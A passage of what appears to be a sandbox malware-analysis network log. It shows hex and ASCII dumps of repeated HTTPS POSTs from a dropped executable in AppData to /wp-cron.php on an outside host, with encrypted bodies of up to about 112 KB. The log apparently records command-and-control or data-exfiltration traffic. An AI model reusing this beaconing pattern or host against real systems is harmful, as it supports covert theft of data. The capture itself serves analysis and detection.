71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0VeoVO5jcUO7vvksrfvP1Gf87T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY
2023-10-03 20:37:57 UTC	3808	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CL%2F%2Ba4NMnS%2FhPonNELRJ%2FD2YEYGyWP6MFljhRs%2FAsxXxz2iejHtnxf1bPR7Cy44UtsBJWz0%2Fo8Ptm8H6DyMWvtlTy%2B3EOqBrQJiVSbtM%2BCBjF7WFT598H1L9FgOUjKk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc684bf5054a-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49897	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:58 UTC	3809	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue
2023-10-03 20:37:58 UTC	3810	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:58 UTC	3890	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:58 UTC	3890	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6d 69 32 38 33 6f 55 38 33 77 55 36 6f 42 76 70 5a 78 64 52 78 70 35 49 6f 37 69 45 56 51 6f 6d 73 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQmi283oU83wU6oBvpZxdRxp5Io7iEVQoms7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY
2023-10-03 20:37:59 UTC	3922	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jCuZ3l4QGH8kt5cQ9l1Nwp8T7GQP8tceekqKKT91b8X%2Fhu%2F3udQH%2BuXCCFcMRSCv3YcZMo%2BAywz2vh767NigwL%2BauwFP31Q1kf9%2BFP%2FWAfrG49fqP5ypEFYWqHaLICM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc70d9353b44-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49898	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:58 UTC	3810	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112820 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:58 UTC	3810	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:58 UTC	3810	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:58 UTC	3810	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 52 61 77 4b 58 43 56 47 41 43 61 69 69 38 66 48 37 30 79 59 54 59 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGURawKXCVGACaii8fH70yYTYIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:37:58 UTC	3826	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:37:58 UTC	3826	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:37:58 UTC	3842	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:37:58 UTC	3842	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:37:58 UTC	3858	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:37:58 UTC	3858	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:37:58 UTC	3874	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:37:58 UTC	3874	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:37:58 UTC	3890	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:37:58 UTC	3890	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:37:58 UTC	3906	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:37:58 UTC	3906	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49896	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:37:58 UTC	3810	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:37:58 UTC	3921	IN	HTTP/1.1 100 Continue
2023-10-03 20:37:58 UTC	3921	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:37:58 UTC	3921	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem
2023-10-03 20:37:59 UTC	3921	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:37:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AbVOMGllDEmHYS5gq7o5N7dR5mS7%2Fj%2BMpaHABkbkiygnRum%2BPLreZ5UQ%2Bv2yD9T2M66hOKbZI74sv6OaoyqP5%2FRFVOCL8O5B7GuigqyovO56wh8fAxTmNnR%2Bq0M6S%2Fw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fc70dd7f082c-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49795	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:35:15 UTC	2779	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 324 Expect: 100-continue
2023-10-03 20:35:15 UTC	2780	IN	HTTP/1.1 100 Continue
2023-10-03 20:35:15 UTC	2780	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:35:15 UTC	2780	OUT	Data Raw: 3d 72 71 36 35 62 59 64 34 75 48 47 65 6d 48 70 63 48 6b 33 37 67 56 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 37 41 46 49 4a 70 56 6a 64 62 65 4a 69 41 44 32 76 68 5a 47 33 63 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 31 32 78 58 43 35 6e 58 36 59 66 2f 38 46 72 37 53 73 57 59 56 6e 6e 36 47 65 54 61 6b 56 75 6e 31 25 32 42 79 61 61 46 63 77 5a 54 66 56 4b 39 51 4b 58 34 71 4e 2f 30 2f 61 47 4e 6e 64 45 38 59 65 6f 33 70 43 63 67 45 63 43 4e 4c 44 53 43 63 39 64 42 38 75 62 68 25 32 42 77 35 69 53 6a 79 64 59 Data Ascii: =rq65bYd4uHGemHpcHk37gVxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0V7AFIJpVjdbeJiAD2vhZG3c7T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u12xXC5nX6Yf/8Fr7SsWYVnn6GeTakVun1%2ByaaFcwZTfVK9QKX4qN/0/aGNndE8Yeo3pCcgEcCNLDSCc9dB8ubh%2Bw5iSjydY
2023-10-03 20:35:16 UTC	2780	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:35:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YLOJu%2Bg20AfAmRfnBgor8iCqwVuAxjUI69o934pgsb2FkSS%2BGdn3LUA9jZEuZLYhRJ%2BkXGKgISdLmX0UAZrsENXtb4rBBzeq9y9rQ%2Fzy%2B%2FfASjwhlSv1fuZRSTwqPMA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107f8777b4b3894-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.4	49901	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:38:10 UTC	3922	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112878 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:38:10 UTC	3923	IN	HTTP/1.1 100 Continue
2023-10-03 20:38:10 UTC	3923	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:38:10 UTC	3923	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 4b 34 62 6a 46 7a 38 6e 58 30 33 53 44 6b 47 46 6e 2f 6b 4d 65 34 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 36 70 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUK4bjFz8nX03SDkGFn/kMe4IMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey6p
2023-10-03 20:38:10 UTC	3939	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:38:10 UTC	3939	OUT	Data Raw: 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 35 44 Data Ascii: wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP5D
2023-10-03 20:38:10 UTC	3955	OUT	Data Raw: 37 Data Ascii: 7
2023-10-03 20:38:10 UTC	3955	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: 